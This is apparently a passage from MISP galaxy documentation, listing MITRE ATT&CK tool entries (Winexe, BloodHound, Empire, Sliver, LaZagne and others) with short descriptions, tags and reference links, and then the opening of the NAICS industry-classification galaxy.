https://attack.mitre.org/software/S1091

https://github.com/RhinoSecurityLabs/pacu

Winexe - S0191

[Winexe](https://attack.mitre.org/software/S0191) is a lightweight, open source tool similar to [PsExec](https://attack.mitre.org/software/S0029) designed to allow system administrators to execute commands on remote servers. (Citation: Winexe Github Sept 2013) [Winexe](https://attack.mitre.org/software/S0191) is unique in that it is a GNU/Linux based client. (Citation: Überwachung APT28 Forfiles June 2015)

The tag is: misp-galaxy:mitre-tool="Winexe - S0191"

Winexe - S0191 has relationships with:

  • similar: misp-galaxy:tool="Winexe" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1035" with estimative-language:likelihood-probability="almost-certain"

Table 7872. Table References

Links

https://attack.mitre.org/software/S0191

https://github.com/skalkoto/winexe/

https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/

xCmd - S0123

[xCmd](https://attack.mitre.org/software/S0123) is an open source tool that is similar to [PsExec](https://attack.mitre.org/software/S0029) and allows the user to execute applications on remote systems. (Citation: xCmd)

The tag is: misp-galaxy:mitre-tool="xCmd - S0123"

xCmd - S0123 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1035" with estimative-language:likelihood-probability="almost-certain"

Table 7873. Table References

Links

https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/

https://attack.mitre.org/software/S0123

BloodHound - S0521

[BloodHound](https://attack.mitre.org/software/S0521) is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.(Citation: GitHub Bloodhound)(Citation: CrowdStrike BloodHound April 2018)(Citation: FoxIT Wocao December 2019)

The tag is: misp-galaxy:mitre-tool="BloodHound - S0521"

BloodHound - S0521 is also known as:

  • BloodHound

Table 7874. Table References

Links

https://attack.mitre.org/software/S0521

https://github.com/BloodHoundAD/BloodHound

https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/

https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf

Pupy - S0192

[Pupy](https://attack.mitre.org/software/S0192) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. (Citation: GitHub Pupy) It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). (Citation: GitHub Pupy) [Pupy](https://attack.mitre.org/software/S0192) is publicly available on GitHub. (Citation: GitHub Pupy)

The tag is: misp-galaxy:mitre-tool="Pupy - S0192"

Pupy - S0192 is also known as:

  • Pupy

Pupy - S0192 has relationships with:

  • similar: misp-galaxy:rat="Pupy" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Scripting - T1064" with estimative-language:likelihood-probability="almost-certain"

Table 7875. Table References

Links

https://attack.mitre.org/software/S0192

https://github.com/n1nj4sec/pupy

MailSniper - S0413

MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.(Citation: GitHub MailSniper)

The tag is: misp-galaxy:mitre-tool="MailSniper - S0413"

MailSniper - S0413 is also known as:

  • MailSniper

Table 7876. Table References

Links

https://attack.mitre.org/software/S0413

https://github.com/dafthack/MailSniper

Expand - S0361

[Expand](https://attack.mitre.org/software/S0361) is a Windows utility used to expand one or more compressed CAB files.(Citation: Microsoft Expand Utility) It has been used by [BBSRAT](https://attack.mitre.org/software/S0127) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)

The tag is: misp-galaxy:mitre-tool="Expand - S0361"

Expand - S0361 is also known as:

  • Expand

Table 7877. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/

https://attack.mitre.org/software/S0361

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand

Tor - S0183

[Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://attack.mitre.org/software/S0183) utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-Generation Onion Router)

The tag is: misp-galaxy:mitre-tool="Tor - S0183"

Tor - S0183 is also known as:

  • Tor

Tor - S0183 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1188" with estimative-language:likelihood-probability="almost-certain"

Table 7878. Table References

Links

http://www.dtic.mil/dtic/tr/fulltext/u2/a465464.pdf

https://attack.mitre.org/software/S0183

Forfiles - S0193

[Forfiles](https://attack.mitre.org/software/S0193) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. (Citation: Microsoft Forfiles Aug 2016)

The tag is: misp-galaxy:mitre-tool="Forfiles - S0193"

Forfiles - S0193 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7879. Table References

Links

https://attack.mitre.org/software/S0193

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11)

Out1 - S0594

[Out1](https://attack.mitre.org/software/S0594) is a remote access tool written in Python and used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021.(Citation: Trend Micro Muddy Water March 2021)

The tag is: misp-galaxy:mitre-tool="Out1 - S0594"

Out1 - S0594 is also known as:

  • Out1

Table 7880. Table References

Links

https://attack.mitre.org/software/S0594

https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html

Responder - S0174

Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. (Citation: GitHub Responder)

The tag is: misp-galaxy:mitre-tool="Responder - S0174"

Responder - S0174 is also known as:

  • Responder

Responder - S0174 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 7881. Table References

Links

https://attack.mitre.org/software/S0174

https://github.com/SpiderLabs/Responder

PowerSploit - S0194

[PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework composed of [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation)

The tag is: misp-galaxy:mitre-tool="PowerSploit - S0194"

PowerSploit - S0194 is also known as:

  • PowerSploit

PowerSploit - S0194 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7882. Table References

Links

http://powersploit.readthedocs.io

http://www.powershellmagazine.com/2014/07/08/powersploit/

https://attack.mitre.org/software/S0194

https://github.com/PowerShellMafia/PowerSploit

meek - S0175

[meek](https://attack.mitre.org/software/S0175) is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.

The tag is: misp-galaxy:mitre-tool="meek - S0175"

meek - S0175 is also known as:

  • meek

meek - S0175 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1172" with estimative-language:likelihood-probability="almost-certain"

Table 7883. Table References

Links

https://attack.mitre.org/software/S0175

IronNetInjector - S0581

[IronNetInjector](https://attack.mitre.org/software/S0581) is a [Turla](https://attack.mitre.org/groups/G0010) toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including [ComRAT](https://attack.mitre.org/software/S0126).(Citation: Unit 42 IronNetInjector February 2021)

The tag is: misp-galaxy:mitre-tool="IronNetInjector - S0581"

IronNetInjector - S0581 is also known as:

  • IronNetInjector

Table 7884. Table References

Links

https://attack.mitre.org/software/S0581

https://unit42.paloaltonetworks.com/ironnetinjector/

ConnectWise - S0591

[ConnectWise](https://attack.mitre.org/software/S0591) is a legitimate remote administration tool that has been used since at least 2016 by threat actors including [MuddyWater](https://attack.mitre.org/groups/G0069) and [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) to connect to and conduct lateral movement in target environments.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)

The tag is: misp-galaxy:mitre-tool="ConnectWise - S0591"

ConnectWise - S0591 is also known as:

  • ConnectWise

  • ScreenConnect

Table 7885. Table References

Links

https://attack.mitre.org/software/S0591

https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies

https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html

SDelete - S0195

[SDelete](https://attack.mitre.org/software/S0195) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. (Citation: Microsoft SDelete July 2016)

The tag is: misp-galaxy:mitre-tool="SDelete - S0195"

SDelete - S0195 is also known as:

  • SDelete

SDelete - S0195 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1116" with estimative-language:likelihood-probability="almost-certain"

Table 7886. Table References

Links

https://attack.mitre.org/software/S0195

https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete

AsyncRAT - S1087

[AsyncRAT](https://attack.mitre.org/software/S1087) is an open-source remote access tool originally available through the NYANxCAT Github repository that has been used in malicious campaigns.(Citation: Morphisec Snip3 May 2021)(Citation: Cisco Operation Layover September 2021)(Citation: Telefonica Snip3 December 2021)

The tag is: misp-galaxy:mitre-tool="AsyncRAT - S1087"

AsyncRAT - S1087 is also known as:

  • AsyncRAT

Table 7887. Table References

Links

https://attack.mitre.org/software/S1087

https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader

https://blog.talosintelligence.com/operation-layover-how-we-tracked-attack/

https://telefonicatech.com/blog/snip3-investigacion-malware

MimiPenguin - S0179

[MimiPenguin](https://attack.mitre.org/software/S0179) is a credential dumper, similar to [Mimikatz](https://attack.mitre.org/software/S0002), designed specifically for Linux platforms. (Citation: MimiPenguin GitHub May 2017)

The tag is: misp-galaxy:mitre-tool="MimiPenguin - S0179"

MimiPenguin - S0179 is also known as:

  • MimiPenguin

MimiPenguin - S0179 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7888. Table References

Links

https://attack.mitre.org/software/S0179

https://github.com/huntergregal/mimipenguin

Havij - S0224

[Havij](https://attack.mitre.org/software/S0224) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. (Citation: Check Point Havij Analysis)

The tag is: misp-galaxy:mitre-tool="Havij - S0224"

Havij - S0224 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 7889. Table References

Links

https://attack.mitre.org/software/S0224

https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/

sqlmap - S0225

[sqlmap](https://attack.mitre.org/software/S0225) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. (Citation: sqlmap Introduction)

The tag is: misp-galaxy:mitre-tool="sqlmap - S0225"

sqlmap - S0225 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 7890. Table References

Links

http://sqlmap.org/

https://attack.mitre.org/software/S0225

QuasarRAT - S0262

[QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)

The tag is: misp-galaxy:mitre-tool="QuasarRAT - S0262"

QuasarRAT - S0262 is also known as:

  • QuasarRAT

  • xRAT

Table 7891. Table References

Links

https://attack.mitre.org/software/S0262

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

https://github.com/quasar/QuasarRAT

https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/

spwebmember - S0227

[spwebmember](https://attack.mitre.org/software/S0227) is a Microsoft SharePoint enumeration and data dumping tool written in .NET. (Citation: NCC Group APT15 Alive and Strong)

The tag is: misp-galaxy:mitre-tool="spwebmember - S0227"

spwebmember - S0227 is also known as:

  • spwebmember

spwebmember - S0227 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"

Table 7892. Table References

Links

https://attack.mitre.org/software/S0227

https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

Remcos - S0332

[Remcos](https://attack.mitre.org/software/S0332) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://attack.mitre.org/software/S0332) has been observed being used in malware campaigns.(Citation: Riskiq Remcos Jan 2018)(Citation: Talos Remcos Aug 2018)

The tag is: misp-galaxy:mitre-tool="Remcos - S0332"

Remcos - S0332 is also known as:

  • Remcos

Table 7893. Table References

Links

https://attack.mitre.org/software/S0332

https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html

https://web.archive.org/web/20180124082756/https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/

https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html

PoshC2 - S0378

[PoshC2](https://attack.mitre.org/software/S0378) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://attack.mitre.org/techniques/T1059/001). Although [PoshC2](https://attack.mitre.org/software/S0378) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.(Citation: GitHub PoshC2)

The tag is: misp-galaxy:mitre-tool="PoshC2 - S0378"

PoshC2 - S0378 is also known as:

  • PoshC2

Table 7894. Table References

Links

https://attack.mitre.org/software/S0378

https://github.com/nettitude/PoshC2_Python

AdFind - S0552

[AdFind](https://attack.mitre.org/software/S0552) is a free command-line query tool that can be used for gathering information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)

The tag is: misp-galaxy:mitre-tool="AdFind - S0552"

AdFind - S0552 is also known as:

  • AdFind

Table 7895. Table References

Links

https://attack.mitre.org/software/S0552

https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/

https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

RemoteUtilities - S0592

[RemoteUtilities](https://attack.mitre.org/software/S0592) is a legitimate remote administration tool that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021 for execution on target machines.(Citation: Trend Micro Muddy Water March 2021)

The tag is: misp-galaxy:mitre-tool="RemoteUtilities - S0592"

RemoteUtilities - S0592 is also known as:

  • RemoteUtilities

Table 7896. Table References

Links

https://attack.mitre.org/software/S0592

https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html

SILENTTRINITY - S0692

[SILENTTRINITY](https://attack.mitre.org/software/S0692) is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in PowerShell, C, and Boo. [SILENTTRINITY](https://attack.mitre.org/software/S0692) was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.(Citation: GitHub SILENTTRINITY March 2022)(Citation: Security Affairs SILENTTRINITY July 2019)

The tag is: misp-galaxy:mitre-tool="SILENTTRINITY - S0692"

SILENTTRINITY - S0692 is also known as:

  • SILENTTRINITY

Table 7897. Table References

Links

https://attack.mitre.org/software/S0692

https://github.com/byt3bl33d3r/SILENTTRINITY

https://securityaffairs.co/wordpress/88021/apt/croatia-government-silenttrinity-malware.html

Xbot - S0298

[Xbot](https://attack.mitre.org/software/S0298) is an Android malware family that was observed in 2016 primarily targeting Android users in Russia and Australia. (Citation: PaloAlto-Xbot)

The tag is: misp-galaxy:mitre-tool="Xbot - S0298"

Xbot - S0298 has relationships with:

  • similar: misp-galaxy:malpedia="Xbot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="TinyNuke" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:banker="TinyNuke" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

Table 7898. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/

https://attack.mitre.org/software/S0298

Empire - S0363

[Empire](https://attack.mitre.org/software/S0363) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://attack.mitre.org/techniques/T1059/001) for Windows and Python for Linux/macOS. [Empire](https://attack.mitre.org/software/S0363) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.(Citation: NCSC Joint Report Public Tools)(Citation: Github PowerShell Empire)(Citation: GitHub ATTACK Empire)

The tag is: misp-galaxy:mitre-tool="Empire - S0363"

Empire - S0363 is also known as:

  • Empire

  • EmPyre

  • PowerShell Empire

Table 7899. Table References

Links

https://attack.mitre.org/software/S0363

https://github.com/PowerShellEmpire/Empire

https://github.com/dstepanic/attck_empire

https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools

Sliver - S0633

[Sliver](https://attack.mitre.org/software/S0633) is an open source, cross-platform, red team command and control framework written in Golang.(Citation: Bishop Fox Sliver Framework August 2019)

The tag is: misp-galaxy:mitre-tool="Sliver - S0633"

Sliver - S0633 is also known as:

  • Sliver

Table 7900. Table References

Links

https://attack.mitre.org/software/S0633

https://labs.bishopfox.com/tech-blog/sliver

RawDisk - S0364

[RawDisk](https://attack.mitre.org/software/S0364) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer’s hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.(Citation: EldoS RawDisk ITpro)(Citation: Novetta Blockbuster Destructive Malware)

The tag is: misp-galaxy:mitre-tool="RawDisk - S0364"

RawDisk - S0364 is also known as:

  • RawDisk

Table 7901. Table References

Links

https://attack.mitre.org/software/S0364

https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf

https://www.itprotoday.com/windows-78/eldos-provides-raw-disk-access-vista-and-xp

LaZagne - S0349

[LaZagne](https://attack.mitre.org/software/S0349) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. [LaZagne](https://attack.mitre.org/software/S0349) is publicly available on GitHub.(Citation: GitHub LaZagne Dec 2018)

The tag is: misp-galaxy:mitre-tool="LaZagne - S0349"

LaZagne - S0349 is also known as:

  • LaZagne

Table 7902. Table References

Links

https://attack.mitre.org/software/S0349

https://github.com/AlessandroZ/LaZagne

Impacket - S0357

[Impacket](https://attack.mitre.org/software/S0357) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://attack.mitre.org/software/S0357) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.(Citation: Impacket Tools)

The tag is: misp-galaxy:mitre-tool="Impacket - S0357"

Impacket - S0357 is also known as:

  • Impacket

Table 7903. Table References

Links

https://attack.mitre.org/software/S0357

https://www.secureauth.com/labs/open-source-tools/impacket

Ruler - S0358

[Ruler](https://attack.mitre.org/software/S0358) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://attack.mitre.org/software/S0358) have also released a defensive tool, NotRuler, to detect its usage.(Citation: SensePost Ruler GitHub)(Citation: SensePost NotRuler)

The tag is: misp-galaxy:mitre-tool="Ruler - S0358"

Ruler - S0358 is also known as:

  • Ruler

Table 7904. Table References

Links

https://attack.mitre.org/software/S0358

https://github.com/sensepost/notruler

https://github.com/sensepost/ruler

Nltest - S0359

[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)

The tag is: misp-galaxy:mitre-tool="Nltest - S0359"

Nltest - S0359 is also known as:

  • Nltest

Table 7905. Table References

Links

https://attack.mitre.org/software/S0359

https://ss64.com/nt/nltest.html

Peirates - S0683

[Peirates](https://attack.mitre.org/software/S0683) is a post-exploitation Kubernetes exploitation framework with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in GoLang and publicly available on GitHub.(Citation: Peirates GitHub)

The tag is: misp-galaxy:mitre-tool="Peirates - S0683"

Peirates - S0683 is also known as:

  • Peirates

Table 7906. Table References

Links

https://attack.mitre.org/software/S0683

https://github.com/inguardians/peirates

ShimRatReporter - S0445

[ShimRatReporter](https://attack.mitre.org/software/S0445) is a tool used by suspected Chinese adversary [Mofang](https://attack.mitre.org/groups/G0103) to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://attack.mitre.org/software/S0444)) as well as set up faux infrastructure which mimics the adversary’s targets. [ShimRatReporter](https://attack.mitre.org/software/S0445) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.(Citation: FOX-IT May 2016 Mofang)

The tag is: misp-galaxy:mitre-tool="ShimRatReporter - S0445"

ShimRatReporter - S0445 is also known as:

  • ShimRatReporter

Table 7907. Table References

Links

https://attack.mitre.org/software/S0445

https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf

CARROTBALL - S0465

[CARROTBALL](https://attack.mitre.org/software/S0465) is an FTP downloader utility that has been in use since at least 2019. [CARROTBALL](https://attack.mitre.org/software/S0465) has been used as a downloader to install [SYSCON](https://attack.mitre.org/software/S0464).(Citation: Unit 42 CARROTBAT January 2020)

The tag is: misp-galaxy:mitre-tool="CARROTBALL - S0465"

CARROTBALL - S0465 is also known as:

  • CARROTBALL

Table 7908. Table References

Links

https://attack.mitre.org/software/S0465

https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

Wevtutil - S0645

[Wevtutil](https://attack.mitre.org/software/S0645) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.(Citation: Wevtutil Microsoft Documentation)

The tag is: misp-galaxy:mitre-tool="Wevtutil - S0645"

Wevtutil - S0645 is also known as:

  • Wevtutil

Table 7909. Table References

Links

https://attack.mitre.org/software/S0645

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil

ROADTools - S0684

[ROADTools](https://attack.mitre.org/software/S0684) is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.(Citation: ROADtools Github)

The tag is: misp-galaxy:mitre-tool="ROADTools - S0684"

ROADTools - S0684 is also known as:

  • ROADTools

Table 7910. Table References

Links

https://attack.mitre.org/software/S0684

https://github.com/dirkjanm/ROADtools

CrackMapExec - S0488

[CrackMapExec](https://attack.mitre.org/software/S0488), or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. [CrackMapExec](https://attack.mitre.org/software/S0488) collects Active Directory information to conduct lateral movement through targeted networks.(Citation: CME Github September 2018)

The tag is: misp-galaxy:mitre-tool="CrackMapExec - S0488"

CrackMapExec - S0488 is also known as:

  • CrackMapExec

Table 7911. Table References

Links

https://attack.mitre.org/software/S0488

https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference

Donut - S0695

[Donut](https://attack.mitre.org/software/S0695) is an open source framework used to generate position-independent shellcode.(Citation: Donut Github)(Citation: Introducing Donut) [Donut](https://attack.mitre.org/software/S0695) generated code has been used by multiple threat actors to inject and load malicious payloads into memory.(Citation: NCC Group WastedLocker June 2020)

The tag is: misp-galaxy:mitre-tool="Donut - S0695"

Donut - S0695 is also known as:

  • Donut

Table 7912. Table References

Links

https://attack.mitre.org/software/S0695

https://github.com/TheWover/donut

https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

https://thewover.github.io/Introducing-Donut/

AADInternals - S0677

[AADInternals](https://attack.mitre.org/software/S0677) is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.(Citation: AADInternals Github)(Citation: AADInternals Documentation)

The tag is: misp-galaxy:mitre-tool="AADInternals - S0677"

AADInternals - S0677 is also known as:

  • AADInternals

Table 7913. Table References

Links

https://attack.mitre.org/software/S0677

https://github.com/Gerenios/AADInternals

https://o365blog.com/aadinternals

https://o365blog.com/aadinternals/

Mythic - S0699

[Mythic](https://attack.mitre.org/software/S0699) is an open source, cross-platform post-exploitation/command and control platform. [Mythic](https://attack.mitre.org/software/S0699) is designed to "plug-n-play" with various agents and communication channels.(Citation: Mythic Github)(Citation: Mythic SpecterOps)(Citation: Mythc Documentation) Deployed [Mythic](https://attack.mitre.org/software/S0699) C2 servers have been observed as part of potentially malicious infrastructure.(Citation: RecordedFuture 2021 Ad Infra)

The tag is: misp-galaxy:mitre-tool="Mythic - S0699"

Mythic - S0699 is also known as:

  • Mythic

Table 7914. Table References

Links

https://attack.mitre.org/software/S0699

https://docs.mythic-c2.net/

https://github.com/its-a-feature/Mythic

https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf

https://posts.specterops.io/a-change-of-mythic-proportions-21debeb03617

NAICS

The North American Industry Classification System or NAICS is a classification of business establishments by type of economic activity (the process of production).

NAICS is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Executive Office of the President Office of Management and Budget

11

Agriculture, Forestry, Fishing and Hunting

The tag is: misp-galaxy:naics="11"

11 has relationships with:

  • parent-of: misp-galaxy:naics="111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115" with estimative-language:likelihood-probability="likely"

111

Crop Production

The tag is: misp-galaxy:naics="111"

111 has relationships with:

  • child-of: misp-galaxy:naics="11" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

1111

Oilseed and Grain Farming

The tag is: misp-galaxy:naics="1111"

1111 has relationships with:

  • child-of: misp-galaxy:naics="111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111140" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111150" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11116" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111160" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11119" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111199" with estimative-language:likelihood-probability="likely"

11111

Soybean Farming

The tag is: misp-galaxy:naics="11111"

11111 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111110" with estimative-language:likelihood-probability="likely"

111110

Soybean Farming

The tag is: misp-galaxy:naics="111110"

111110 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11111" with estimative-language:likelihood-probability="likely"

11112

Oilseed (except Soybean) Farming

The tag is: misp-galaxy:naics="11112"

11112 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111120" with estimative-language:likelihood-probability="likely"

111120

Oilseed (except Soybean) Farming

The tag is: misp-galaxy:naics="111120"

111120 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

